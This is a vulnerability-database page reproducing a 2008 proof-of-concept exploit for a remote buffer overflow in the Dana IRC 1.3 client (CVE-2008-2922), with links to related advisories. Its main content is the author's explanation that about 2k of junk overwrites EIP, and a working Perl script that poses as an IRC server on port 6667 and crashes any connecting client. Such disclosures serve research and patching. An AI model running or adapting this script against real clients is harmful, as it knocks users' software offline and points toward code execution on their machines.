Lucene search
+L

Dana IRC 1.3 - Remote Buffer Overflow (PoC)

🗓️ 14 Jun 2008 00:00:00Reported by t0pP8uZzType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 40 Views

Dana IRC 1.3 Remote Buffer Overflow Po

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2008-2922
14 Jun 200800:00
circl
Check Point Advisories
Stack-based Buffer Overflow in Artegic Dana IRC Client (CVE-2008-2922)
15 Oct 201500:00
checkpoint_advisories
CVE
CVE-2008-2922
30 Jun 200818:00
cve
Cvelist
CVE-2008-2922
30 Jun 200818:00
cvelist
Exploit DB
Dana IRC 1.4a - Remote Buffer Overflow
25 Aug 200800:00
exploitdb
NVD
CVE-2008-2922
30 Jun 200818:24
nvd
Prion
Stack overflow
30 Jun 200818:24
prion
- Dana IRC <= 1.3 Remote Buffer Overflow POC/Crash -

	Discovered On: 14 JUNE 2008
	Discovered By: t0pP8uZz

	Download: diebestenbits.de


	- Info -

	Dana Irc client suffers from a remote buffer overflow, sending a buffer of around 2k
	overwrites the EIP therefor crashes the client. The reason why there isnt any shellcode here
	is because the client is coverting the junk/buffer data to unicode so its corrupting the shellcode
	ive tried sending unicode buffer but the same problem occurs.

	if anyone else can get further please let me know. but i doubt you can.

	there are also other registers you can overwrite using diffrent junk data to overflow them.

	the peice of perl code below will listen on port 6667 and when a Dana IRC client connects
	it will crash the client. its also possible to send the data direct to the user.

	peace, t0pP8uZz

#!/usr/bin/perl

use IO::Socket;

$sock = IO::Socket::INET->new( Proto => 'tcp', LocalPort => '6667', Listen => SOMAXCONN, Reuse => 1 );

$jnk = "%n"x1000;
print "Running..";
while($client = $sock->accept()) {
    print $client "$jnk\r\n";
    print "Crashed Client!\n";
}

# milw0rm.com [2008-06-14]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation